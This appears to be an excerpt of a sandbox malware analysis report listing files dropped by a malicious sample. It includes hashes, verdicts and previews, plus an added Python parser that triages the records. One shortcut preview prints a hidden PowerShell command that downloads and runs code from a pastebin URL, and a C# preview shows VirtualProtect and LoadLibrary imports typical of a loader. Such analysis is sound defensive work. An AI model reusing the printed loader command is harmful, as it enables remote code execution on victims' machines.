3ckUhKW8W6.exe | malicious | ScreenConnect Tool | 104.20.3.235, 162.159.138.232, 185.199.109.133
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | xK44OOt7vD.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\Backend.dll | xK44OOt7vD.exe | malicious | Unknown
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
Category: dropped
Size (bytes): 1728
Entropy (8bit): 4.527272298423835
Encrypted: false
SSDEEP: 24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
MD5: 724AA21828AD912CB466E3B0A79F478B
SHA1: 41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
SHA-256: D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
SHA-512: B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
Malicious: true
                                                                                  Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.7067022986836794
Encrypted: false
SSDEEP: 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqn:2JIB/wUKUKQncEmYRTwh07
MD5: 18E9D86CE6FBC4D5D2589CD7D5584584
SHA1: 04B356C17E7C062C0C11C1F4616677F933FBD195
SHA-256: 47E89C562DBD9A3DC809886C45FFE61234FA412AA151DFA270211C1395F34D75
SHA-512: E125B56F34629D90E18161D87EB7DD92B24E4041285703575308EA495838BAA42E1CCE42399A27737D3894479CFC9CB2517F9A2B23F37618973FB463A56A8426
Malicious: false
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe0fbb24a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                  Category:dropped
                                                                                  Size (bytes):1310720
                                                                                  Entropy (8bit):0.7900027763263399
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
                                                                                  MD5:284F6EBE92B12F4DDD42E885932442EE
                                                                                  SHA1:5217A322509A111EDB8DA2926C3CBE287DE41046
                                                                                  SHA-256:466C0FF1F99FB76A1C9F7C98068CB851D4CA51E0631AA40D095A9A9D368AC5B9
                                                                                  SHA-512:071A61C8BE9BB17883DE6ED3C4C401B813275D46C5BF7B61577E331AFED4F26B9516E8B8D6C2AD8DAFD47DD6100C7B02EF5FCBB016288F6C75E879FA751A285E
                                                                                  Malicious:false
                                                                                  Preview:...J... ...............X\...;...{......................0.`.....42...{5......|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................i^.......|...................E.B.....|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):16384
                                                                                  Entropy (8bit):0.08217889886404028
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:LIkYeeHUZqtD1t/57Dek3JV0Zqj/AllEqW3l/TjzzQ/t:zzmUUDHR3tV0C/Amd8/
                                                                                  MD5:8A0B2F596B402D13EE95117DF7281AF0
                                                                                  SHA1:DEFAF856E78A17C583C3238AE5B484B4EE056690
                                                                                  SHA-256:A677487115DA8836FA84A664A32AEDDE9D58F5AC5BC371AE0B4D717E63C7657D
                                                                                  SHA-512:57FD93D4AA9024CB740F6DA9823A416CAA8BC0FDA859D903521A6360F9515E0A415CA95B63FE721F119E16AD19A24C1E705AD607252DE900A4AB11734D894156
                                                                                  Malicious:false
                                                                                  Preview:.c.9.....................................;...{.......|..42...{5.........42...{5.42...{5...Y.42...{59.................E.B.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):11608
                                                                                  Entropy (8bit):4.890472898059848
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                  Malicious:false
                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllul9p:NllU9
                                                                                  MD5:A9A0CCA1C30EF3D233EAD1A8B1C0C996
                                                                                  SHA1:862BE22EFDC58CDBD36D6FC520D0AADC2CA7F721
                                                                                  SHA-256:A38EFCDB0157A93B27DC080CD343ECC8464393A34C92600049AD3EA0F7EA34C2
                                                                                  SHA-512:6F2AE9D31A54F7812D289D4C855DFBE68A55950E5E75314A4BAAAB9D100101A14832CD1F04CEF612C0BA797AB7A783641E867CAA2BA1F221C170F81392BDC2CB
                                                                                  Malicious:false
                                                                                  Preview:@...e...............................R.3..............@..........
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):31744
                                                                                  Entropy (8bit):5.733195715654648
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:d+NjrSvLsSPa/1ZX3ohNQGDYOMg3P2SFZ2W1whvMDNGeSeu6dt3YXvu6:cpSvLQbOMgOSuQwRMRGe3deXvu6
                                                                                  MD5:228092BB00D909AEE1F694A26074CB57
                                                                                  SHA1:E409B75364693456006CADF61F2A5DDEF311ED0E
                                                                                  SHA-256:05FF6FB5A27E37AAB0269106830A0E1A56C709428AB130BBDDEFF737452E6FE3
                                                                                  SHA-512:3B714852BEB607C1EE394613E5974131CE7617C8E34E808F81DF4382ADC62CD61A81A0CFBA5019F9D40A8F38171A4E1FD75137529CEE4896FD10F55912E23E3C
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: xK44OOt7vD.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.X..............F.....L.......L.......L.......L...................Y.....................*.............Rich............PE..d......a.........." .....J...4.......L..........Bi7.......................................`..........................................t..H....v.......................................d..T...........................Pe..8............`..0............................text...!H.......J.................. ..`.rdata.......`... ...N..............@..@.data................n..............@....pdata...............r..............@..@.rsrc................x..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Tue Oct 15 18:08:04 2024, 1st section name ".debug$S"
                                                                                  Category:modified
                                                                                  Size (bytes):1340
                                                                                  Entropy (8bit):4.0357826759451925
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:HeK9o0Uk/lpZHHwKOZmNeI+ycuZhN8akSIPNnqSed:c0HlpZwKOZmw1ul8a3wqS+
                                                                                  MD5:4ADBD2A8BD40228CAB9868D29D8B5457
                                                                                  SHA1:3FA0F0BA24B1211BC95BAEF5985ADEE957C51095
                                                                                  SHA-256:88811D705F6E2835884020725CD9EA2800563859757239A6E397AD07C3923244
                                                                                  SHA-512:42B949649CA0C5965B1A40717B9E0CEB269E407781233ABE7A12B2FC92F8D7380FCDC7562BF322EBE8FBD41701891597115DCA3F89CE0A2493626D9AD366FECA
                                                                                  Malicious:false
                                                                                  Preview:L......g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........X....c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP...................v.[..................7.......C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.w.d.a.o.j.u.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):56320
                                                                                  Entropy (8bit):2.33688169239766
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:fcSG5Fnm1dQ1ej1YFmq/KFnp4H7OIcu7VYSEtuhjRTK6xZbkvwKwq6uiPmo/PmU:kvUdacFnp67ONu7xEW1XxeseU
                                                                                  MD5:BECD67D75C5E7C2411E9F481086CA1E0
                                                                                  SHA1:F7F5F1A3AFB7E3454797B2CAD62D298BB1B20345
                                                                                  SHA-256:E87B1FCB789B6957B5C99A1393738E928D3918F1E46DB20F761D57AD015AA385
                                                                                  SHA-512:D86DA68BA9BD3C992B33C99A3B96DFFEA3032E9B769A91A7FED33EC654E48A61A6E6715C630080D5D5E6390F4FC09B398111EAAAD60E3304B552DD0AC353B67E
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: xK44OOt7vD.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0......T........... .....@..... ....................... ............`...@......@............... ...................................R........................................................................................... ..H............text........ ...................... ..`.rsrc....R.......T..................@..@........................................H........2...#......!....U...O............................................(....*6.(.....( ...*..(....*.(....*.(....,..(....*.{....r...po.....{....o....*.0..I........{....o........(.......(.....(Y(.......(.......(.....LY(.....{.....o....*z(....,..{....o.....{....o....*J.{....o.....(....*..{....r9..po....(.....{....o....*....0..F.......(......,<.{....o......3..{....rc..po....+..{....rq..po.....{....o....*...0..y.........s ...%%o!...j(....o".....o#...,J.r...p($...-..r...p($...-".r...p($
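The dropped-file records in this list are flat `Key:Value` lines, with bullet sub-entries under the `Antivirus:` and `Joe Sandbox View:` headers. Reading hundreds of them by eye is error-prone, so an analyst normally parses them into structures and applies triage rules mechanically: the sandbox verdict, a script host (here powershell.exe) writing a PE to disk, a .NET compiler chain (csc/cvtres) leaving objects behind, and the 60-byte "AppLocker lockdown mode" probe that PowerShell itself writes on every start and that is safe to ignore. The following parser and rule set is an added example, not part of the Joe Sandbox report or its tooling; the sample text is constructed from three of this section's records trimmed to the fields the rules use, and the entropy threshold, the process lists and the known-benign hash table are assumptions a real workflow would tune.

```python
"""Parse Joe Sandbox 'Dropped Files' records and apply simple triage rules."""

# Constructed sample: three records from the report, trimmed to the fields used here.
SAMPLE = """\
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):31744
Entropy (8bit):5.733195715654648
MD5:228092BB00D909AEE1F694A26074CB57
SHA-256:05FF6FB5A27E37AAB0269106830A0E1A56C709428AB130BBDDEFF737452E6FE3
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: xK44OOt7vD.exe, Detection: malicious, Browse
Preview:MZ......................@...
Process:C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections
Category:modified
Size (bytes):1340
Entropy (8bit):4.0357826759451925
MD5:4ADBD2A8BD40228CAB9868D29D8B5457
SHA-256:88811D705F6E2835884020725CD9EA2800563859757239A6E397AD07C3923244
Malicious:false
Preview:L......g.............debug$S...
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
"""

# Assumed allow-list: PowerShell's __PSScriptPolicyTest_*.ps1 probe has constant content.
KNOWN_BENIGN_MD5 = {"D17FE0A3F47BE24A6453E9EF58C94641": "powershell applocker probe"}
# Assumed process lists; extend to taste.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
COMPILER_TOOLS = ("csc.exe", "vbc.exe", "cvtres.exe")
HIGH_ENTROPY = 7.2  # assumed threshold; 8.0 is the maximum for byte data


def parse_records(text):
    """Split the flat Key:Value listing into one dict per dropped file.

    A new record starts at each 'Process:' line. A header whose value is empty
    (Antivirus:, Joe Sandbox View:) collects the bullet lines that follow it.
    """
    records, current, last_key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            if current is not None and isinstance(current.get(last_key), list):
                current[last_key].append(line.lstrip("• ").strip())
            continue
        key, _, value = line.partition(":")  # first colon only: paths keep 'C:\'
        key, value = key.strip(), value.strip()
        if key == "Process":
            current = {}
            records.append(current)
        if current is None:
            continue
        current[key] = value or []
        last_key = key
    return records


def triage(rec):
    """Return the list of reasons a record deserves attention (empty = nothing found)."""
    md5 = rec.get("MD5", "").upper()
    if md5 in KNOWN_BENIGN_MD5:
        return ["benign: " + KNOWN_BENIGN_MD5[md5]]
    reasons = []
    proc = rec.get("Process", "").lower().rsplit("\\", 1)[-1]
    ftype = rec.get("File Type", "")
    if rec.get("Malicious", "").lower() == "true":
        reasons.append("sandbox verdict malicious")
    if ftype.startswith(("PE32", "MS-DOS executable")) and proc in SCRIPT_HOSTS:
        reasons.append(f"{proc} wrote a PE ({ftype.split(',')[0]})")
    if rec.get("Preview", "").startswith("MZ") and not ftype.startswith("PE32"):
        reasons.append("MZ header but non-PE file type (mislabelled executable?)")
    if proc in COMPILER_TOOLS:
        reasons.append("runtime compilation artifact (.NET compiler chain active)")
    try:
        entropy = float(rec.get("Entropy (8bit)", "0"))
    except ValueError:
        entropy = 0.0
    if entropy > HIGH_ENTROPY:
        reasons.append(f"high entropy {entropy:.2f} (packed/encrypted payload?)")
    av = rec.get("Antivirus", [])
    if reasons and isinstance(av, list) and any("Detection: 0%" in a for a in av):
        reasons.append("zero AV detection despite other indicators (hash lookups alone would miss it)")
    return reasons


def triage_all(text):
    """Map each record's SHA-256 to its triage reasons."""
    return {r.get("SHA-256", "?"): triage(r) for r in parse_records(text)}


if __name__ == "__main__":
    for sha, reasons in triage_all(SAMPLE).items():
        print(sha[:16], reasons)
```

The zero-detection rule is the point of the exercise: both PE files in this list carry a 0% ReversingLabs score yet a malicious sandbox verdict, so a pipeline that only looks up hashes against AV feeds would pass them. Feeding the full report text to `parse_records` works as long as the records keep the `Process:` line as the first field of each entry; the per-file path headers that the HTML report shows above each record are not needed by the parser.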
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.1077875425013333
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryHqak7YnqqqbPN5Dlq5J:+RI+ycuZhN8akSIPNnqX
                                                                                  MD5:02B6EC83D076115BCF17D30BFA17F9BD
                                                                                  SHA1:43C07E59B7615BEB6B9F61626558816D3F01C620
                                                                                  SHA-256:C2D325F642CA92E4254ED38C8A94DDB1126832B1B7F786B9BFDEBBCCEF979BC6
                                                                                  SHA-512:D14587521C3132594868F5A1F243F9E474C01FD6A35581C7ACF4A0C314D15039145F06FF40B7397EF07DDC83F94F1A47B8FCC39F2C52D5CA4788C6EEB77A2133
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.w.d.a.o.j.u.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.w.d.a.o.j.u.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text
                                                                                  Category:dropped
                                                                                  Size (bytes):1140
                                                                                  Entropy (8bit):4.751587839856729
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:JjajwGHNw7+qFhL/+PS+oXG4mnF1D7ZTHtws4bx:JjaEGHNw7+Ib+6+oXZIF17Zrtws4bx
                                                                                  MD5:FE35992F552A2057291C867108A5C2EB
                                                                                  SHA1:3359CC35D11E68B353BBF06D03F1A9937E2689EE
                                                                                  SHA-256:C6CD29B3B2981C29538DEB9B4445A10EC4993E93F058621F49E6AE294B4B6D1F
                                                                                  SHA-512:8E639DB3A4696FFD380C495CF816B2571656D51AEA0B3DA75FBFC7151F1DE704FE1508FF61C95FC2AC2EF230FD6FEE48536C074D71F025675103B737128E9DFF
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..public class MyUtilityClass {. // Renamed class for clarity.. // Additional variables. private const string Kernel32Library = "kernel32";. . // Function declarations. [DllImport(Kernel32Library)]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);.. [DllImport(Kernel32Library)]. public static extern IntPtr LoadLibrary(string name);.. [DllImport(Kernel32Library)]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. // Additional method for clarity. public static IntPtr LoadLibraryAndGetProcAddress(string libraryName, string procName) {. IntPtr hModule = LoadLibrary(libraryName);. if (hModule == IntPtr.Zero) {. throw new Exception("Failed to load library: " + libraryName);. }.. IntPtr procAddress = GetProcAddress(hModule, procName);. if (procAddress == In
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):377
                                                                                  Entropy (8bit):5.242072843949939
